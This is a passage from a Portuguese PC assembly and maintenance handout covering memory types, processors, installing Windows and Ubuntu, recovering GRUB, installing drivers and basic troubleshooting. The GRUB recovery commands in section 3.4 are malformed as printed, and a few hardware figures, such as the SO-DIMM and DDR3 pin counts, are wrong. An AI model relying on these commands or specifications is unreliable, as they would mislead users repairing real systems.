Ao instalar dois ou mais HDs na mesma máquina, deixe sempre que


possível um espaço de uma ou duas baias entre eles, o que ajuda
bastante na questão da refrigeração.

É sempre chato ficar colocando parafusos dos dois lados, tanto para
os HDs, quanto para o drive óptico, mas é importante que você os
instale corretamente, usando todos os parafusos. A questão funda-
mental aqui é a vibração. Colocando parafusos apenas de um lado,
ou colocando apenas um de cada lado, a movimentação da cabeça
de leitura dos HDs e do drive óptico vão fazer com que o drive vibre
dentro da baia, aumentando o nível de ruído do micro, sem falar de
possíveis problemas relacionados ao desempenho ou mesmo à vida
útil dos drives. Concluindo, falta apenas instalar a placa de vídeo e
outras placas de expansão (como uma segunda placa de rede, mo-
dem ou uma placa de captura) e a montagem está completa.

417
Figura 2.15: Fixação da Placa de Vídeo

Alguns poucos gabinetes utilizam protetores independentes para as


aberturas dos slots, mas na maioria é usada uma simples chapa cor-
tada, onde você precisa remover as tampas dos slots que serão usa-
dos. Algumas sempre esbarram em capacitores da placa-mãe, por
isso precisam ser removidas com mais cuidado. O aço cortado é pra-
ticamente uma lâmina, é bem fácil se cortar.

Figura 2.16: Slots

418
Tanto os slots PCI Express x16, quanto os slots AGP, utilizam um
sistema de retenção para tornar o encaixe da placa de vídeo mais
firme. Ao remover a placa, não se esqueça de puxar o pino do lado
direto do slot, senão você acaba quebrando-o.

Figura 2.17: Detalhe: Placa presa ao Slot

Toda placa-mãe inclui pelo menos um jumper, o jumper responsável


por limpar o CMOS (CLR_CMOS ou CLRTC). Em muitas placas, ele
vem de fábrica na posição discharge (com o jumper entre os pinos 2
e 3), para evitar que a bateria seja consumida enquanto a placa fica
em estoque. A maioria das placas não dão boot enquanto o jumper
estiver nesta posição, o que pode ser confundido com defeitos na
placa.

Antes de ligar o PC, certifique-se que o jumper está na posição 1-2


(indicada no manual como Normal ou “Default”).

419
2.1 Compatibilidade da placa mãe com o processador

Basicamente, não temos um modelo padrão de placa mãe. Para cada


modelo de processador ou uma família de modelos temos caracterís-
ticas específicas que devem ser fornecidas pela placa, inclusive o
encaixe (socket) não é o mesmo para os vários processadores.

Cada tipo de processador tem características que o diferenciam de


outros modelos. Essas diferenças consistem na capacidade de pro-
cessamento, na quantidade de memória cache, na tecnologia de fa-
bricação usada, no consumo de energia, na quantidade de terminais
(as “perninhas”) que o processador tem, entre outros. Assim sendo, a
placa-mãe deve ser desenvolvida para aceitar determinados proces-
sadores.

Portanto, procure saber antes de comprar um computador qual a


melhor relação entre placa-mãe e processador, normalmente, os fa-
bricantes de placas listam em seus sites os modelos das placas que
são compatíveis com os vários modelos de processadores. Isto é
mais importante ainda quando deseja-se fazer a troca do processa-
dor, pois devemos observar se a placa atual se adequa ao novo mo-
delo, caso negativo a placa mãe deverá ser trocada também!

2.2 Diferenças entre memórias

As memórias podem se diferenciar em diversos aspectos. Listamos


os principais a seguir.

Tipologia

Podemos distinguir os 2 tipos de memórias: Memória principal: tam-


bém chamadas de memória real, são memórias que o processador
pode endereçar diretamente, sem as quais o computador não pode
funcionar. Estas fornecem geralmente uma ponte para as secundá-
rias, mas a sua função principal é a de conter a informação necessá-
ria para o processador num determinado momento; esta informação
pode ser, por exemplo, os programas em execução. Nesta categoria
insere-se a memória RAM (volátil), memória ROM (não volátil), regis-
tradores e memórias cache. Memória secundária: memórias que não

420
podem ser endereçadas diretamente, a informação precisa ser carre-
gada em memória principal antes de poder ser tratada pelo processa-
dor. Não são estritamente necessárias para a operação do computa-
dor. São geralmente não-voláteis, permitindo guardar os dados per-
manentemente. Incluem-se, nesta categoria, os discos rígidos, CDs,
DVDs e disquetes. Às vezes faz-se uma diferença entre memória
secundária e memória terciária. A memória secundária não necessita
de operações de montagem (inserção de uma mídia ou média em um
dispositivo de leitura/gravação) para acessar os dados, como discos
rígidos; a memória terciária depende das operações de montagem,
como discos ópticos e fitas magnéticas, entre outros.

Tecnologias

Memórias Voláteis

Memória dinâmica: A memória dinâmica é a mais barata delas e,


portanto, a mais utilizada nos computadores e são aquelas que foram
popularizadas como memórias RAM. Este atributo vem do nome in-
glês Randomic Acess Memory (memória de acesso aleatório), que
significa que os dados nela armazenados podem ser acessados a
partir de qualquer endereço. As memórias RAM se contrapõem com
as de acesso sequencial, que exigem que qualquer acesso seja feito
a iniciar pelo primeiro endereço e, sequencialmente, vai “pulando” de
um em um até atingir o objetivo. Na realidade, existem outras memó-
rias de acesso aleatório nos computadores, inclusive não voláteis,
portanto, é importante ter o conhecimento de que o nome RAM é
apenas uma popularização do nome da memória principal dos com-
putadores, utilizada para armazenar os programas e dados no mo-
mento da execução.

O nome dinâmica é referente à tecnologia utilizada para armazenar


programas e dados e não à forma de acessá-los. De modo simplista
ela funciona como uma bateria que deve ser recarregada sempre que
apresentar carga insuficiente para alimentar o equipamento.

Todas as vezes que a CPU (unidade de processamento central) for


acessar a memória, para escrita ou para leitura, cada célula dessa
memória é atualizada. Se ela tem 1 lógico armazenado, sua “bateria”

421
será recarregada; se ela tem 0 lógico, a “bateria” será descarregada.
Este procedimento é chamado de refresco de memória, em inglês,
refresh.

Memória estática

A memória estática não necessita ser analisada ou recarregada a


cada momento. Fabricada com circuitos eletrônicos conhecidos como
latch, guardam a informação por todo o tempo em que estiver a rece-
ber alimentação.

Memória não voláteis

São aquelas que guardam todas as informações mesmo quando não


estão ligadas. Como exemplos, citam-se as memórias conhecidas por
ROM, FeRAM e FLASH, bem como os dispositivos de armazenamen-
to em massa, disco rígido, CDs e disquetes. As memórias somente
para leitura, do tipo ROM (sigla de Read Only Memory), permitem o
acesso aleatório e são conhecidas pelo fato de o usuário não poder
alterar o seu conteúdo. Para gravar uma memória deste tipo são ne-
cessários equipamentos específicos.
Modelos

SIMM (Single In-line Memory Modules)

Os SIMMs utilizam apenas um dos lados da placa para armazenar os


chips de memória (DRAM, EDO or BEDO). Um SIMM contem vários
chips. Os primeiros SIMMs transferiam 8 bits de dados por cada ciclo
e possuiam 30 pinos/terminais. Com a passagem para os 32 bits, foi
desenvolvido um SIMM maior de 72 pinos/terminais. Qualquer dos
SIMMs é instalado mediante uma ligeira inclinação.

DIMM (Dual In-line Memory Modules)

Os DIMMs (13.65cm x 2.54cm) utilizam ambos os lados da placa para


armazenar os chips de memória (DRAM, EDO ou BEDO). Os DIMMs
possuem 168 pinos/terminais e transferem dados a 64 bit. Os DIMMs
são instalados verticalmente e desinstalados mediante pressão nas
patilhas laterais.

422
SO DIMM (Small Outline DIMM)

SO DIMMs são usados nos computadores portáteis e são menores


que os DIMMs normais. Existem no formato 72 pinos/terminais/32 bits
e 14 pinos/terminais/64 bits.

RDRAM – RIMM

A Rambus, Inc, em conjunto com a Intel criou uma nova tecnologia a


Direct RDRAM, que aumentou a velocidade de acesso à memória.
Com 184 pinos/terminais consegue atingir os 1.6 GB por segundo.

DDR

É uma evolução da SDRAM e consegue duplicar a velocidade de


leitura/escrita por ciclo do relógio. Possui 184 pinos/terminais (133.35
mm x 30 mm). A memória DDR é fabricada em várias velocidades
para poder corresponder às diferentes FSB das motherboard. Sua
tensão de alimentação é de 2,5 V.

DDR2

Como o próprio nome indica, a memória DDR2 (133.35 mm x 30 mm)


é uma evolução da memória DDR. Entre suas principais característi-
cas estão o menor consumo de energia elétrica, menor custo de pro-
dução, maior largura de banda de dados e velocidades mais rápidas.
Ao contrário do que alguns pensam, a memória DDR2 não é compa-
tível com as motherboard que trabalham com memória DDR. Embora
os pinos/terminais de ambos os tipos pareçam iguais à primeira vista
(pois possuem o mesmo tamanho), na verdade, não são. Para come-
çar, o tipo DDR tem 184 pinos/terminais e o DDR2 conta com 240
pinos/terminais. Sua tensão de alimentação é de 1,8 V, contra 2,5V
da DDR

DDR3

Como o próprio nome indica, a memória DDR3 é uma evolução da


memória DDR2. Possui 204 pinos e também possui vários modelos

423
com velocidades diferentes. Sua tensão de alimentação é de 1,5 V,
contra 1,8 V da DDR2.

Comparação entre os modelos de memórias


Memória | Clock Real | Taxa de Transferência Máxima Teórica | Módulo
de Memória
DDR200 100 MHz 1.600 MB/s
PC-1600
DDR266 133 MHz 2.133 MB/s
PC-2100
DDR333 166 MHz 2.666 MB/s
PC-2700
DDR400 200 MHz 3.200 MB/s
PC-3200
DDR2-400 200 MHz 3.200 MB/s
PC2-3200
DDR2-533 266 MHz 4.266 MB/s
PC2-4200
DDR2-667 333 MHz 5.333 MB/s
PC2-5300
DDR2-800 400 MHz 6.400 MB/s
PC2-6400
DDR2-1066 533 MHz 8.533 MB/s
PC2-8500
DDR3-800 400 MHz 6.400 MB/s
PC3-6400
DDR3-1066 533 MHz 8.500 MB/s
PC3-8500
DDR3-1333 666 MHz 10.666 MB/s
PC3-10600
DDR3-1600 800 MHz 12.800 MB/s
PC3-12800

2.3 Processadores

Características

CLOCK:

Quando vamos comprar um processador, a primeira coisa que per-


guntamos é qual sua frequência de operação, medida em Gigahertz
(GHz) ou bilhões de ciclos por segundo, frequência também chamada

424
de clock. Acontece, que nem sempre um processador com uma velo-
cidade de operação mais alta é mais rápido do que outro que opera a
uma frequência um pouco mais baixa. A frequência de operação de
um processador indica apenas quantos ciclos de processamentos são
realizados por segundo, o que cada processador é capaz de fazer em
cada ciclo já é outra história.

MEMÓRIA CACHE:

Tipo ultra-rápido de memória que serve para armazenar os dados


mais frequentemente usados pelo processador, evitando na maioria
das vezes que ele tenha que recorrer à comparativamente lenta me-
mória RAM. Sem ela, o desempenho do sistema ficará limitado à
velocidade da memória, podendo cair em até 95%! São usados dois
tipos de cache, chamados de cache primário, ou cache L1 (level 1), e
cache secundário, ou cache L2 (level 2).

O cache primário é embutido no próprio processador e é rápido o


bastante para acompanhá-lo em velocidade. Sempre que um novo
processador é desenvolvido, é preciso desenvolver também um tipo
mais rápido de memória cache para acompanhá-lo. Como este tipo
de memória é extremamente caro (chega a ser algumas centenas de
vezes mais cara que a memória RAM convencional) usamos apenas
uma pequena quantidade dela.

Para complementar, usamos também um tipo um pouco mais lento de


memória cache na forma do cache secundário, que por ser muito
mais barato, permite que seja usada uma quantidade muito maior.

CAPACIDADE (16bits, 32bits e 64bits):

Quando nos referimos a processadores de 16 bits, 32 bits ou 64 bits


estamos falando dos bits internos do chip - em poucas palavras, isso
representa a quantidade de dados e instruções que o processador
consegue trabalhar por vez. Por exemplo, com 16 bits um processa-
dor pode manipular um número de valor até 65.535. Se certo número
tem valor 100.000, ele terá que fazer a operação em duas partes. No
entanto, se um chip trabalha a 32 bits, ele pode manipular números
de valor até 4.294.967.296 em uma única operação.

425
Agora, suponha que você esteja utilizando um editor de textos. É
improvável que esse programa chegue a utilizar valores grandes em
suas operações. Neste caso, qual a diferença entre utilizar um pro-
cessador de 32 bits ou 64 bits, sendo que o primeiro será suficiente?
Como o editor utiliza valores suportáveis tanto pelos chips de 32 bits
quanto pelos de 64 bits, as instruções relacionadas serão processa-
das ao mesmo tempo (considerando que ambos os chips tenham o
mesmo clock).

Por outro lado, aplicações em 3D ou programas como AutoCad re-


querem boa capacidade para cálculo e aí um processador de 64 bits
pode fazer diferença. Suponha que determinadas operações utilizem
valores superiores a 4.294.967.296. Um processador de 32 bits terá
que realizar cada etapa em duas vezes ou mais, dependendo do va-
lor usado no cálculo. Todavia, um processador de 64 bits fará esse
trabalho uma única vez em cada operação.

No entanto, há outros fatores a serem considerados. Um deles é o


sistema operacional (SO). O funcionamento do computador está dire-
tamente ligado à relação entre o sistema operacional e o hardware
como um todo. O SO é desenvolvido de forma a aproveitar o máximo
de recursos da plataforma para o qual é destinado. Assim, o Windows
XP ou uma distribuição Linux desenvolvido antes do surgimento de
processadores de 64 bits são preparados para trabalhar a 32 bits,
mas não a 64 bits, ou seja, se você estiver com um processador de
64 bits operando com um sistema operacional de 32 bits ele trabalha-
rá como se fosse um processador de 32 bits, e seu desempenho má-
ximo não será explorado. Finalizando, basicamente o SO deve ser
compatível com a capacidade do processador.

DUAL-CORE:

Um processador dual-core é um processador de dois núcleos, como


se fosse dois processadores que compartilham os mesmos recursos,
como memória cache e RAM. Uma observação importante a ser feita
é que um processador dual-core não é 2 vezes mais rápido que um
processador simples, em geral é um pouco mais lento que isso. Vá-

426
rios fatores influenciam nessa não correspondência de velocidade.
Mas geralmente é mais vantajoso comprar um dual-core.

Capítulo 3

Formatação do HD e Instalação de Sistemas Operacionais

Primeiro temos que saber alguns conceitos.

Formatar

Formatar um HD significa – simplificadamente – apagar suas infor-


mações. Antes de instalar qualquer sistema operacional (Windows,
Linux etc.) o HD deve ser formatado, o que normalmente já é feito
em seu processo de fabricação.

Quando se fala em PC (Personal Computer), formatar um HD geral-


mente é usado para corrigir um erro de difícil reparação e/ou otimizar
o sistema. Fazer que um programa ou até mesmo o próprio sistema
operacional funcione e tornar um computador mais rápido são pro-
blemas que podem ser solucionados com a formatação.

Lembre-se que na formatação todos os dados do disco são apaga-


dos.

Particionar

Particionar significa dividir, em uma ou mais partes, o HD. É importan-


te notar que, só pelo fato de usar um sistema operacional, o HD já
obrigatoriamente estará particionado, mesmo que só em uma parte.

Podemos dividir o HD em mais de uma parte por diversos motivos,


entre outros: para organizar o computador em “sistema” e “arquivos
comuns”; para instalar mais de um sistema operacional; para uso de
backup (cópia de segurança); para algumas tarefas de multiusuários;
para simples critério de organização e para otimizar a gravação de
um CD.

3.1 Preparação para formatação do HD

427
Deve-se seguir os seguintes passos antes de se formatar o HD.

3.1.1 Reavaliar a necessidade de formatá-lo

Formatar um computador demanda entre outras coisas tempo e tra-


balho. Não importa o quão experiente seja o usuário, com maior ou
menor frequência, haverá problemas ao formatar um PC. É prudente
tentar analisar e resolver cada problema que motiva a formatação.
Portanto, só é recomendado formatar um computador quando houver
problemas sérios sem solução aparente ou quando se prever mais
tempo e trabalho para solucioná-los do que para formatar o HD.

3.1.2 Salvar arquivos e informações desejados em um lugar que não


vai ser formatado

Planos minimizam erros. Para planejar-se a formatação é preciso


adequar os passos a cada caso específico e organizar as informa-
ções. Por exemplo, é interessante anotar cada arquivo que se deseje
salvar bem como onde encontrar determinados drivers e informações.
Com um plano bem feito em mãos otimiza-se o tempo e customiza-se
o trabalho.

Recomenda-se que se crie uma pasta chamada BACKUP onde tudo


será salvo. Depois basta ir realizando o backup na ordem do guia.
Quando chegar na parte de programas e arquivos, é interessante
salvar pastas inteiras e indicar de alguma maneira a localização da
pasta salva (colocando no nome a localização da pasta para depois
copiá-la de volta - ex: c - documents and settings).

É necessário ter bastante atenção para que não se esqueça nada,


pois os erros mais graves e mais frequentes ocorrem nessa etapa. É
preciso ainda saber que o guia não passa de uma regra, que pode ter
exceções, ou seja, é necessário atentar para outros arquivos que não
se encaixem na lista do guia, mas que precisam ser salvos. Ciente
disso, basta verificar.

O que salvar de cada usuário

428
Vale a pena para essa etapa, criar uma pasta para cada usuário no
local de backup e ir copiando cada parte importante para cada usuá-
rio.

a) Desktops: Basta, normalmente, ir à pasta Documents and Settings,


geralmente em C:\ e copiar a pasta Desktop de cada usuário e salvar
no local de backup organizadamente para posterior recuperação.

b) Meus Documentos: Basta, normalmente, ir à pasta Documents and


Settings, geralmente em C:\ e copiar a pasta Meus Documentos ou
copiar a pasta onde o usuário guarda seus documentos.

O que salvar do computador

a) Drivers: O ideal é que se tenham todos os CDs de drivers que vêm


quando se compra um computador ou que se tenha uma pasta em
algum lugar que não será formatado ou CD com todos os drivers
usados no PC.

Quando não houver nenhuma das alternativas anteriores, resta apelar


para alguns programas que identificam, salvam e posteriormente
restauram os drivers do computador. Ex: My Drivers, Driver Genius
etc. Geralmente basta pedir para ele encontrar os drivers e salvar em
um lugar que não será formatado e depois de instalado o Sistema
Operacional, basta recuperá-los pelo programa. Mais detalhes sobre
a instalação de drivers são tratados em 3.5

b) Programas e arquivos de programas importantes: É necessário


criar uma lista de cada programa instalado no computador, quais
arquivos se deseja salvar desses programas e onde encontrar o exe-
cutável para reinstalação posterior do programa.

3.1.3 Dando boot pelo CD

Isso significa fazer com que o computador inicie-se a partir do CD, e


não do HD. Isso é necessário pois a instalação de um sistema opera-
cional deve ser feita sem a necessidade de algum outro sistema ope-
racional já instalado.

429
Para tanto, siga os passos:

1. Reinicie o Computador e tecle DEL para entrar no SETUP

2. Altere a prioridade de boot para o CD

Para isso, cada placa mãe tem uma maneira diferente que é indicada
no manual. Contudo, sempre é necessário listar, na ordem, as unida-
des em que serão buscados os arquivos de inicialização. O usuário
pode descobrir navegando nos menus do SETUP até achar a palavra
chave BOOT. Às vezes está em Advanced Setup, às vezes em Ad-
vanced Settings, às vezes em Boot Device. Há ainda em algumas
placas mães a necessidade de apertar F11 ou F6 ou outro F qualquer
para que se encontre um menu de prioridade de boot.

Normalmente dispositivos apresentam-se com nomes um pouco


complicados como:

Ao invés de leitora de cd: HL-DT-ST GCE-8526B Ao invés de leitora


de DVD: HL-DT-ST DVDRAM GSA-4163B Vale observar que nor-
malmente os HDs possuem o número da sua capacidade em Giga-
bytes nesse nome, exemplo:

Ao invés de HD de 40Gb: WDC WD400EB-00CPF0

Ao invés de HD de 80Gb: SAMSUNG SP0802N

O importante é ter o entendimento geral de prioridade de boot e ir


navegando pelo SETUP até fazer o computador reiniciar pelo CD.

Agora que o sistema está pronto para dar boot pelo CD vamos à ins-
talação do Windows.

3.2 Formatando e instalando Windows

1. Insira o DVD do Windows 7 e reinicie seu computador;

2. Entre na BIOS e escolha para dar boot pelo DVD;

430
3. Antes de começar a carregar o Windows, ele pedirá que você
pressione qualquer tecla para iniciar via DVD-Rom, faça isso;

4. Aguarde enquanto o sistema carrega os arquivos necessários (o


que leva algum tempo, dependendo da velocidade do seu micro).

5. Escolha o idioma, o horário, a data e o padrão do teclado que você


utiliza. Após isso, clique emcontinuar;

6. Na próxima tela você terá as opções de particionamento de disco,


clique em opções de drive para particionar. Selecione a partição que
deseja que seja feita a instalação do Windows. Clique em próximo;

7. Agora você precisa apenas esperar que o programa continue a


instalação, esta etapa pode demorar alguns minutos.;

8. Assim que o computador reiniciar o sistema solicitará informações


como: nome do computador e usuário. Preencha e clique em próxi-
mo.

9. Na próxima tela você tem as opções de atualização, recomenda-se


que o windows seja atualizado frequentemente.

10. O próprio sistema fará agora as últimas configurações. Após isso


ele estará pronto para uso.

3.3 Instalando o Ubuntu

1. Insira o CD-ROM do Ubuntu e reinicie seu computador.

2. Entre na BIOS e escolha para dar boot pelo CD-ROM.

3. Antes de começar a carregar o Ubuntu, o sistema solicitará que


você pressione qualquer tecla para iniciar via CD-Rom. Faça isso.

4. Quando o instalador carregar, ele te oferecerá a opção de testar o


Ubuntu e de instalá-lo no computador, escolha a opção de instalação.
Na barra à esquerda você tem a opção de escolher o idioma a ser
instalado.

431
5. Na tela seguinte você deve escolher o país e o fuso horário, esco-
lha e clique em avançar.

6. A seguir você tem a opção de escolher o layout do teclado. O que


contém a tecla ç (c cedilha) é o ABNT2. Escolha e clique em avançar.

7. Agora você tem a opção de escolher a partição para a instalação


do linux, escolha a opção de especificar particionamento manualmen-
te e clique em avançar.

8. Antes de você criar a partição para a instalação do Sistema Opera-


cional (S.O.), é recomendado que você crie uma partição de SWAP.
Para fazer isso na barra “usar como:” escolha “área de troca
(SWAP)”. Recomenda-se que a partição de SWAP tenha o dobro do
tamanho da sua memória RAM.

9. Você agora deve escolher o espaço para criar a partição. Para o


formato de montagem escolha o ext4 e na caixa de ponto de monta-
gem escolha / (barra).

10. Você deve ter o cuidado de escolher um espaço que você queira,
de fato, sobrescrever. Tenha cuidado para não sobrescrever outras
partições que você esteja usando (por exemplo a do Windows insta-
lado no item 3.2).

11. Na tela seguinte você deve definir o nome do computador, um


usário e a senha desse usuário. Muita atenção nesta hora. Escolha e
clique em avançar.

12. Agora o instalador te confirma as informações que você forneceu


na etapa anterior. Confira e clique em instalar. O instalador só irá
fazer alterações no seu computador após você clicar em instalar.

13. Desse ponto em diante você não precisa fazer mais nada, o pró-
prio instalador concluirá o processo.

3.4 Recuperando o GRUB

432
O GRUB (Grand Unified Bootloader) é um gerenciador de boot usado
em várias distros Linux. Quando você reinstala o Windows ou, even-
tualmente, quando o Windows faz atualizações, ele instala seu pró-
prio gerenciador de boot, que não “enxerga” sistemas linux, sendo
assim necessário que reinstalemos o GRUB para poder usar o linux.

Para reinstalar o GRUB será necessário um live-CD (que é um disco


que pode carregar o S.O. Sem instalá-lo), a maioria dos cds de insta-
lação do linux são live-CDs.

Se você dispõe de um cd do ubuntu, quando ele te der a opção de


instalar ou testar o sistema, você deve escolher testar o sistema.

1. Quando o sistema do live-CD iniciar, abra o terminal e entre como


root (comando su);

2. Crie uma pasta para o sistema do live-CD montar o sistema do


linux instalado no seu PC: mkdir -p/mnt/linux;

3. Agora com o comando fdisk -l veja em qual partição o linux estará


montado, provavelmente será algo como /dev/sdax, onde x represen-
ta o número da partição linux;

4. Agora monte o sistema na pasta anteriormante criada com o co-


mando mnt/dev/sdax/
mnt/linux, substitua x pelo número da partição em que o linux está
instalado no seu computador;

5. Agora use os comandos a seguir: mount -o


bind/dev/mnt/linux/dev e mount -t proc none/mnt/linux/proc;

6. Devemos agora acessar a partição montada como root, para isso


use o comando chroot/mnt/linux/bin/bash;

7. Utilizaremos agora o comando para atualizar o GRUB:


/usr/sbin/update-grub;

8. Instalando o GRUB: grub-install/dev/sda;

433
9. Agora saia do chroot com o comando exit;

10. Desmonte agora as parições montadas com os comandos


umount/mnt/linux/proc; umount/mnt/linux/dev e
umount/mnt/linux;

11. Agora e só reiniciar o computador com o comando reboot. Lem-


bre-se de retirar o disco quando o computador estiver sendo reinicia-
do.

3.5 Instalação dos drivers

Após a instalação do Windows é necessário instalar os drivers do


componentes que o Windows não possui. Os drivers são programas
que fazem seu hardware funcionar corretamente. Por exemplo, para
fazer sua placa de vídeo funcionar é necessário instalar o driver para
aquele exato modelo.

Para instalar os driver das placas onboard, normalmente rede e som,


basta inserir o CD de instalação que veio junto com a placa mãe e
seguir as instruções.

Para as placas off board, use o CD de instalação que veio com a


placa.

Em ambos os casos, talvez você tenha perdido o CD de instalação ou


necessita instalar um versão mais nova para resolver alguma incom-
patibilidade ou para ter novos recursos. Para tanto precisamos primei-
ro saber a marca e modelo da placa. Podemos fazer isso de duas
maneiras:

1. Abrir o gabinete e procurar a marca e modelo da placa escritas em


algum chip. Se for para uma placa onboard, o melhor é tentar identifi-
car a marca e modelo da placa mãe olhando na própria placa, como
mostrado na figura 3.1

Se a placa for off board deve-se procurar a marca e modelo escrita


em algum chip ou na própria placa, como mostrado na figura 3.2

434
Figura 3.1:
Marca e modelo da placa mãe. No caso, marca GigaByte, modelo
G31M-S2L

2. Usar o programa HWinfo32, disponível no site:


www.superdownloads.com.br. Existe a versão portable, que não exi-
ge que o programa seja instalado no computador. Quando executa-se
o programa ele já mostra qual o seu processador, placa e vídeo e
mais algumas informações. Com ele você também pode saber infor-
mações de alguns sensores do computador, como temperatura e
velocidade dos coolers.

3. A figura 3.3 mostra o modelo da placa mãe do computador. Note


que o menu esquerdo também está mostrando a marca e modelo da
placa de vídeo, no caso uma ATI 9550. Identificada a marca e mode-
lo, procure no google o site do fabricante e vá na seção de downloads
ou suporte para fazer o download do driver apropriado.

435
Figura 3.2:
Marca e modelo da placa de som. No caso, marca Creative, modelo
SB0570

Figura 3.3:
Marca e modelo da placa mãe usando o HWinfo32. No caso, marca
Asus, modelo P4S8X-MX

Identificando dispositivos não instalados

Para saber quais os dispositivos não possuem drivers instalados,


clique com o botão direito em Meu Computador, Propriedades, aba
Hardware e clique no “Gerenciador de Dispositivos”. Os dispositivos
que ainda não estiverem instalados ou com algum outro problema
terão um sinal de exclamação ao seu lado.

436
Se preferir, tente achar o driver para o dispositivo usando o Windows
Update. Para tanto, clique duas vezes no dispositivo que não está
instalado e clique no botão “Reinstalar driver”. Na janela que apare-
cer, selecione a opção que permite que o Windows Update procure o
driver. Tenha certeza de que esteja conectado à internet.

Instalando apenas o driver, sem instalar outros softwares

Muitas vezes ao instalar um driver não instalamos somente o driver


em si e sim algum software de controle a mais. Por exemplo, ao insta-
lar o driver de vídeo usando o setup do programa, é instalado tam-
bém um software para controle de frequência do monitor, resolução,
entre outras coisas. Quando instala-se o driver de som usando o se-
tup dele, instala-se também um gerenciador de áudio que fica resi-
dente na memória do sistema.

Esse gerenciador pode controlar a conexão e desconexão de disposi-


tivos.

Se você não quer que esses outros softwares sejam instalados, tem a
opção de instalar somente o necessário. Para tanto, clique com o
botão direito em Meu Computador, Propriedades, aba Hardware e
clique no “Gerenciador de Dispositivos”. Clique duas vezes no dispo-
sitivo que não está instalado e clique no botão “Reinstalar driver”.
Você será perguntado se deseja usar o Windows Update. Responda
que não. Após isso, escolha o local que se encontra o driver e confir-
me. O sistema instalará somente o driver.

Capítulo 4

Soluções de problemas comuns

Nessa seção são listados os problemas mais comuns em computado-


res e suas possíveis soluções. Ressaltase aqui a importância do co-
nhecimento do funcionamento geral de um computador, uma vez que
esse conhecimento levará a uma identificação melhor do problema e
de suas possíveis soluções.

437
Esses procedimentos requerem cuidados especiais por parte da pes-
soa que os está executando.

Nunca abra um gabinete de PC sem antes verificar se já acabou a


sua garantia. Uma máquina nova sempre vem com lacre da revenda
ou fabricante (pequena etiqueta adesiva que se rasga quando tenta-
se removê-la). Se essa etiqueta estiver danificada, o fornecedor sabe-
rá que o computador foi violado e se eximirá de trocar quaisquer pe-
ças defeituosas.

4.1 O computador não liga

Esse é um dos problemas que pode ter a maior variedade de causas


possíveis. Tentaremos identificar o maior número possível delas.

4.1.1 Alimentação externa

Caso o computador não esteja dando sinal de que esteja ligado, atra-
vés de barulhos ou luzes, o problema pode ser a falta de alimentação
externa.

Verifique se o computador está corretamente ligado à rede elétrica e


certifique-se que o cabo esteja firmemente preso. Caso esteja ligado
a um estabilizador ou no-break , verifique se este está ligado.

Verifique também se a fonte do computador possui um botão traseiro


de liga e desliga. Caso possua, o botão deve estar na posição “I”, que
indica ligado. A posição “O” indica desligado.

Outra verificação a fazer é a seleção de voltagem. Por exemplo, caso


a tensão da sua cidade seja 110V, mova a chave de seleção para a
posição que faça com que apareça a numeração 110.

Caso o computador ainda não ligue e nem o filtro de linha / no-break,


tente ligar um outro aparelho na tomada para ter certeza de que a
tomada esteja funcionando.

4.1.2 Fonte do computador e cabeamento interno

438
A fonte é a responsável em transformar a corrente alternada de
110Volts / 220volts em contínua de 12volts, 5volts e 3volts, depen-
dendo do periférico acoplado ao cabo interno de alimentação.

Atualmente existem muitas fontes de energia de fabricação chinesa


que possuem componentes de péssima qualidade. Essa fontes são
normalmente conhecidas como fontes genéricas, pois anunciam uma
potência de 400W enquanto só fornecem uma potência de 250W ou
menos. Essas fontes possuem um alto índice de falha e por isso ne-
cessitam ser trocadas frequentemente.

Se você tem certeza que a alimentação externa está funcionando,


tenha feito as verificações apontadas nas seção 4.1.1 e o computador
não liga quando pressiona-se o botão ligar, então a fonte de alimen-
tação pode ser o problema.

Antes de condenar a fonte, verifique as conexões de alimentação


internas:

- Verifique se os fios que partem do painel frontal do gabinete está


corretamente ligados à placa-mãe. Use o manual da placa mãe para
saber o local correto de conexão.

- Verifique se os cabos da fonte de alimentação estão ligados corre-


tamente à placa mãe. Cheque se a placa mãe necessita de alimenta-
ção especial para o processador (um plugue de quatro pinos) e se o
cabo da fonte de alimentação está ligado a ele.

Tendo feito essas verificações, com o gabinete aberto, tente ligar o


computador e verifique se o cooler (ventilador) do processador está
rodando, assim como o cooler da fonte. Caso negativo, o problema
pode ser mesmo a fonte. Para ter certeza, pegue emprestada a fonte
de um outro computador para ver se tudo vai funcionar.

4.2 O computador liga e ouço barulhos, mas não aparece nada na


tela

Se isso acontecer pode ser por dois motivos principais: problema na


parte de vídeo ou na memória do computador.

439
4.2.1 Verificando o vídeo

Caso o led do monitor esteja apagado, certifique-se que o monitor


esteja conectado a uma fonte com energia que esteja funcionando.

Pode ser também que o cabo de dados entre o monitor e o computa-


dor não esteja firmemente conectado. Se isso acontecer, irá aparecer
uma mensagem na tela do monitor dizendo que não há cabo conec-
tado, ou então o led que indica que o monitor está ligado ficará pis-
cando.

Caso a placa de vídeo seja off board, verifique se a mesma está fir-
memente conectada à placa mãe.

Você pode tentar também ligar o computador usando um outro moni-


tor.

Dica: na maioria dos computadores, se estiver tudo OK com os com-


ponentes principais de dentro do gabinete, um único bip será emitido
ao ligar. Nesse caso, exclua a possibilidade de falha de componentes
internos importantes e veja se o monitor está funcionando.

Verificando a memória

A memória com certeza é o hardware que mais falha em um compu-


tador doméstico. Quando isso ocorre, o computador liga mas não
inicia. Muitas vezes o computador começa a emitir bips Felizmente,
pode ser apenas a sujeira ou oxidação que esteja atrapalhando a
comunicação da placa mãe com a memória do computador. Para
verificar essa situação, siga os passos:

- Desligue o computador e não se esqueça de retirar o cabo de força


da tomada. Espere alguns segundos.

- Abra o gabinete e retire os módulos de memória dos slots.

- Com a ajuda de um pincel macio, limpo e seco, limpe os slots de


memória, retirando toda a sujeira existente. Algumas pessoas sim-

440
plesmente assopram nesses slot, mas isso não é recomendável, uma
vez que a saliva pode criar um curto que pode queimar a placa mãe.
Caso haja oxidação, talvez seja necessário o uso de produtos pró-
prios para isso. Esses produtos vêm em sprays e devem sem passa-
dos com cuidado. Espere o produto secar para recolocar os módulos.

- Nos módulos de memória, use uma borracha branca e que não solte
muitos fiapos para limpar a área de contato metálico. Cuidado com o
manuseio dos módulos.

- Recoloque os módulos de memória no lugar e ligue o computador.

Se esse procedimento não resolveu o problema, tente ligar o compu-


tador com apenas um módulo de memória de cada vez. Se o compu-
tador ligar é porque o outro módulo memória está com problemas e
possivelmente terá que ser feita a troca dele.

4.3 O computador reinicia sozinho

O reinício do computador pode ter várias causas.

O Windows pode ter feito algumas atualizações no sistema que exigi-


ram o reinício automático do computador. Nesse caso, uma mensa-
gem aparecerá na tela pedindo sua confirmação. Muitas vezes as
